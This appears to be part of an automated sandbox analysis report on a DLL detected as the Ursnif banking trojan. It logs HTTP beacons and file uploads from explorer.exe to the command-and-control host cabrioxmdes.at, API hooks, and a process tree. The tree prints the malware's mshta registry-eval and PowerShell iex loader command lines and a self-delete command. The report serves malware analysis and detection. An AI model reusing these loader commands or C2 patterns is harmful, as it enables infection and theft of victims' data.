d1 d8 fe 25 26 12 38 1b 82 d0 20 3b b0 3a fc 78 fc c8 27 35 80 8c 3d 50 5e ac c0 9e 9d 60 4a d8 67 fd 0b 23 73 81 de e8 b6 92 23 2a 8b 3a 3e 6b c6 30 c7 50 f7 e0 9f 2d 41 bc 35 53 4a e5 0d 04 6e b3 3e 74 33 6d 8f 7e 23 d7 bf 78 78 ef ae 5a b9 bc 02 45 46 d8 8c 41 c3 a9 4e 7f 95 d2 4c d0 e0 2a 09 df b3 ad d9 52 c0 cb 92 bb 54 36 e8 82 b6 65 88 39 d7 a3 ec 7f 3a 70 bc 89 a3 24 54 c1 36 15 89 70 44 54 cc 9d 36 48 a4 0b 08 82 70 e1 8f 42 83 01 2c 8a 46 89 74 3b f0 2e 6c dd 01 ce 2d 06 bc 25 97 f6 98 1e d3 17 ab 54 a1 bc 7d b1 0b ce 72 55 e0 4b 60 12 34 c2 16 18 66 cb dc a6 fa 75 1c eb cf 35 22 58 8b 6f b0 53 f0 ac 29 7b 05 a8 36 39 ec ea 59 a1 d0 84 23 99 b9 d8 00 95 20 e1 45 61 c2 89 5d 33 c2 03 ce 59 4c a8 a0 7c b9 1a cb 8b b5 01 26 93 12 8e 7c 1e fb be 43 c8 53 8c
                                                        Data Ascii: ]p{3jR1?,.8tYTYZgMHDlW)06Xsp|>xWK9w^MWU4W@nM\H4g$PI9uz|>H@G~ yM6imMM?dx^!{Zqs\X;Pj,)HN8&Smh/0!p~5 &qCHgGOR"l}:*%V*uuq#9z|mfYBLA"ePiLYn"{DLQ]h]"KL2&v$|6v1Cb&=LO1EI~[6T'\=3cysXb./J}&=C<-.z6lO\y_YW&RtZ32x9EvDpR8Hmt+r11BHj)fhp!<cGPG=H jJ5zhrc}:(PbtzT;/#\2S{S7,!igUAPgAeV~92H_0~}oM1k^nfRm&%&8 ;:x'5=P^`Jg#s#*:>k0P-A5SJn>t3m~#xxZEFANL*RT6e9:p$T6pDT6HpB,Ft;.l-%T}rUK`4fu5"XoS){69Y# Ea]3YL|&|CS


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.449825116.121.62.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:23.154438972 CEST12942OUTGET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:24.441509008 CEST12942INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449836116.121.62.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:35.078524113 CEST12968OUTPOST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=318247997342640097891112487322
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 563
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:35.080523968 CEST12968OUTData Raw: 2d 2d 33 31 38 32 34 37 39 39 37 33 34 32 36 34 30 30 39 37 38 39 31 31 31 32 34 38 37 33 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c
                                                        Data Ascii: --318247997342640097891112487322Content-Disposition: form-data; name="upload_file"; filename="90BF.bin"k]pv 6_[Ac[tgK(0>\22n3^N]xR6<:8Ot]@]_J<,~5Z[gX[s*zdHFD&v
                                                        May 4, 2022 16:21:36.648550987 CEST12983INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.449845116.121.62.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:37.325897932 CEST12991OUTPOST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=315998012542640097891134987170
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 387
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Data Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a
                                                        Data Ascii: --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--
                                                        May 4, 2022 16:21:38.620135069 CEST12997INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        Function NameHook TypeActive in Processes
                                                        CreateProcessAsUserWEATexplorer.exe
                                                        CreateProcessAsUserWINLINEexplorer.exe
                                                        CreateProcessWEATexplorer.exe
                                                        CreateProcessWINLINEexplorer.exe
                                                        CreateProcessAEATexplorer.exe
                                                        CreateProcessAINLINEexplorer.exe
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                                        Processes

                                                        Process: explorer.exe, Module: KERNEL32.DLL
                                                        Function NameHook TypeNew Data
                                                        CreateProcessAsUserWEAT7FF80250521C
                                                        CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessWEAT7FF802505200
                                                        CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessAEAT7FF80250520E
                                                        CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        Process: explorer.exe, Module: WININET.dll
                                                        Function NameHook TypeNew Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FF802505200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT7E3B6B0
                                                        Process: explorer.exe, Module: user32.dll
                                                        Function NameHook TypeNew Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FF802505200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT7E3B6B0

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                                                        Imagebase:0x110000
                                                        File size:116736 bytes
                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:1
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x1190000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:2
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x11a0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Target ID:19
                                                        Start time:16:19:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                                        Imagebase:0x7ff70ad70000
                                                        File size:14848 bytes
                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:20
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                                        Imagebase:0x7ff6ba650000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Target ID:21
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:22
                                                        Start time:16:19:38
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        General

                                                        Target ID:23
                                                        Start time:16:19:41
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Target ID:24
                                                        Start time:16:19:44
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\control.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\control.exe -h
                                                        Imagebase:0x7ff6a5e80000
                                                        File size:117760 bytes
                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Target ID:25
                                                        Start time:16:19:45
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                                                        Imagebase:0x7ff7cb6d0000
                                                        File size:2739304 bytes
                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:moderate

                                                        General

                                                        Target ID:26
                                                        Start time:16:19:47
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                                                        Imagebase:0x7ff7bf6d0000
                                                        File size:47280 bytes
                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Target ID:27
                                                        Start time:16:19:56
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6f3b00000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:33
                                                        Start time:16:20:11
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:34
                                                        Start time:16:20:13
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:35
                                                        Start time:16:20:15
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping localhost -n 5
                                                        Imagebase:0x7ff689210000
                                                        File size:21504 bytes
                                                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:36
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:37
                                                        Start time:16:20:20
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                                        Imagebase:0x7ff67f250000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:38
                                                        Start time:16:20:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:40
                                                        Start time:16:20:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:42
                                                        Start time:16:20:27
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\nslookup.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                        Imagebase:0x7ff713510000
                                                        File size:86528 bytes
                                                        MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:44
                                                        Start time:16:20:35
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:45
                                                        Start time:16:20:37
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
